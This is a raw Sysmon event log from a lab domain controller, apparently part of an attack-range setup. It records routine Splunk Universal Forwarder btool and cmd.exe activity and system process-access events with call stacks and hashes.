Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4324-6000-B400-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B400-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B400-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4324-6000-B300-000000009A01}4740736C:\Windows\system32\cmd.exe{08A6967A-4324-6000-B400-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.926{08A6967A-4324-6000-B400-000000009A01}808C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4324-6000-B300-000000009A01}4740C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B300-000000009A01}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B300-000000009A01}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.917{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4324-6000-B300-000000009A01}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.919{08A6967A-4324-6000-B300-000000009A01}4740C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B200-000000009A01}2428C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 